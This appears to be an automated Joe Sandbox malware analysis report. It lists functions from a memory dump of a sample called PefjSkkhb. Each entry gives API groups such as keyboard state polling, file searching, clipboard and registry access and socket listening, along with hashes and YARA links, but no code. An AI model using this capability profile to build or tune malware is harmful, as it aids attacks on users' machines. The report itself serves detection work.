                                                                                                                                                                                                                    Function 00007FF656D3A350 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 112fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                    • API String ID: 1409584000-438819550
                                                                                                                                                                                                                    • Opcode ID: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
                                                                                                                                                                                                                    • Instruction ID: cd5c62e45838e375587c0b1e997e6c743cdf39d0456370cdcc2e0b600352bd19
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD418425B0864254EB00DB55E8482B973A1FB48BE4F8C5B31DD6EA76E4DF7EE44AC300
                                                                                                                                                                                                                    Function 00007FF656D2D87C Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 66COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: SendString
                                                                                                                                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                    • API String ID: 890592661-1007645807
                                                                                                                                                                                                                    • Opcode ID: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                                                                                                                                                                                    • Instruction ID: 1602f2a02b0eee5dd5f98074fca3fc5c3c67f78786fe5338e0133e9e48673220
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5121B422B0865291EB20DB24F854A7A7330FFD5748FD84731EA4DA39A8DE3ED505C740
                                                                                                                                                                                                                    Function 00007FF656D27E64 Relevance: 18.2, APIs: 12, Instructions: 173keyboardCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                                                                                                    • Opcode ID: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
                                                                                                                                                                                                                    • Instruction ID: b0bd21d5ce9e013d783b11c661581e80a30f89f9fb35f8d522529da6d6aad33b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15710D62A0C2C245FBB48B30D8102BA3B61EF45B84F5D0B79D68DA7392CE5FD949C721
                                                                                                                                                                                                                    Function 00007FF656D3A4F8 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 104fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                    • API String ID: 2640511053-438819550
                                                                                                                                                                                                                    • Opcode ID: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                                                                                                                                                                                    • Instruction ID: b61f8cf8118fc18b73fad2ae3b637ad7c4a959ccd1bc4f3eb4e87c6d4843bc07
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E241D121B0CA4250EA009B15E8446B963A0FF45BE4F8C5B31DD6EA76E5EF7EE44AC740
                                                                                                                                                                                                                    Function 00007FF656D5055C Relevance: 16.9, APIs: 11, Instructions: 371registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryValue$Close$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3218304859-0
                                                                                                                                                                                                                    • Opcode ID: 3675ea05932dfaeee47e18892e9d9f601483245729433ef10cdf78513c485231
                                                                                                                                                                                                                    • Instruction ID: fe41a03f1356162282a02a8c6b2a0810112b8a9f0a4186295c8d0fecd38cfaa6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3675ea05932dfaeee47e18892e9d9f601483245729433ef10cdf78513c485231
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46F1A172B09B4286EB10DF65D0906AC33B0FF99B98B488631DE4DA7BA5DF39E041C744
                                                                                                                                                                                                                    Function 00007FF656D383D4 Relevance: 16.8, APIs: 11, Instructions: 255comCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2762341140-0
                                                                                                                                                                                                                    • Opcode ID: 4c09cf08bebec6d76310be6fba43cdc90c390545f29504737260acbc379edfdc
                                                                                                                                                                                                                    • Instruction ID: 616a82829ad7dd55629e47c3a63bb60728c68252da00f47ecdbe5c733055d01c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c09cf08bebec6d76310be6fba43cdc90c390545f29504737260acbc379edfdc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3DC18C76B08B8582EB10DF66E8841AD77B0FB88B94F498636DE4E97765CF3AD045C700
                                                                                                                                                                                                                    Function 00007FF656D1C858 Relevance: 16.7, APIs: 11, Instructions: 166COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1255039815-0
                                                                                                                                                                                                                    • Opcode ID: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
                                                                                                                                                                                                                    • Instruction ID: 38faa48f2c7af50705e33fc27bdce104045c059a3a42f43e7df1ecde8fd4e083
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57619F26B046568AEB10DF62D8449BD37B4FB44B88B084B35DE0EA3B95DF7ED945C340
                                                                                                                                                                                                                    Function 00007FF656D46C34 Relevance: 15.3, APIs: 10, Instructions: 296fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2395222682-0
                                                                                                                                                                                                                    • Opcode ID: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
                                                                                                                                                                                                                    • Instruction ID: 3f60839b3b449e560e1e228367f01f4a118d887147c2d4255f4efaee4df4c27e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BCD17237B04B8686EB109F75D4401AD33B1FB84B89B584636DE8EA7B64DFBAD845C340
                                                                                                                                                                                                                    Function 00007FF656D5A59C Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 312131281-0
                                                                                                                                                                                                                    • Opcode ID: abdc22e6bb891721ce5e067b69be811f88521fd2379c3c8bf9918a79da049ba4
                                                                                                                                                                                                                    • Instruction ID: 309fe29c90a28e47594f406e10bce5032849e4f8de35e0e402c04be0989e550f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: abdc22e6bb891721ce5e067b69be811f88521fd2379c3c8bf9918a79da049ba4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6071A036609A9185EB20CF65D8446ED37A0FBC9B98F484632DA4D97FA4CF3ED186C700
                                                                                                                                                                                                                    Function 00007FF656D40D24 Relevance: 15.1, APIs: 10, Instructions: 86clipboardmemoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1737998785-0
                                                                                                                                                                                                                    • Opcode ID: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
                                                                                                                                                                                                                    • Instruction ID: f1714caa6a0f62df80a4f578c8b0f7cc2ca0cafcd5898fee157257e6c2e0cc20
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D413AB2A0864286EF049F16D5943387760FF94B85F088A35CA4E977A6CFBEE455CB04
                                                                                                                                                                                                                    Function 00007FF656D2B7C0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 171fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$Find$Delete$AttributesCloseCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                    • API String ID: 4047182710-1173974218
                                                                                                                                                                                                                    • Opcode ID: 3e5e0e112cc80aa2c2516f057e4a01b659553512389772208b3739e74699da54
                                                                                                                                                                                                                    • Instruction ID: 84724b70863dd8836f4eb6e19b181dad71f293d28cd0c08ded57fe736b0caf3f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e5e0e112cc80aa2c2516f057e4a01b659553512389772208b3739e74699da54
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4981A862A0864295EB50DB60E8411FD7B70EF94398F881232EE4EE76B9DF7DD589C700
                                                                                                                                                                                                                    Function 00007FF656D1D780 Relevance: 13.6, APIs: 9, Instructions: 54memorythreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1957940570-0
                                                                                                                                                                                                                    • Opcode ID: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                                                                                                                                                                                    • Instruction ID: 001114fc1c1e3baea73962ebe374dc58378a2cebe6ecd61c14977dac8fc86c01
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C212872919B8182EB108F52E44836AB7A0F789FDAF484635DA8D13B64CF7DD198CB40
                                                                                                                                                                                                                    Function 00007FF656CF2650 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 155timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                    • String ID: ?
                                                                                                                                                                                                                    • API String ID: 500310315-1684325040
                                                                                                                                                                                                                    • Opcode ID: 94c2f1c66049ff4599948a3e12081019eb49e95131d575ab39d1df6a0a8379ea
                                                                                                                                                                                                                    • Instruction ID: 8d5442f911015b292a5b34a0a1064f55991bee29f81d984b2f9b7e6cd9867025
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94c2f1c66049ff4599948a3e12081019eb49e95131d575ab39d1df6a0a8379ea
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E61A4B2A1864286E760DF21E8501B9B7B4FF84798F484236E90EE3B94DF3EE441C750
                                                                                                                                                                                                                    Function 00007FF656D43940 Relevance: 12.1, APIs: 8, Instructions: 116networkCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 540024437-0
                                                                                                                                                                                                                    • Opcode ID: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                                                                                                                                                                                    • Instruction ID: 2c0d3c4dc905e658497c769980ea088381012802cbe010497bd1ffa12c0e366d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01417FA2A0868286EB10DF1AD4402687760FF85FA4F4D4B30DE9E97792CFBEE541C744
                                                                                                                                                                                                                    Function 00007FF656D48360 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 331COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
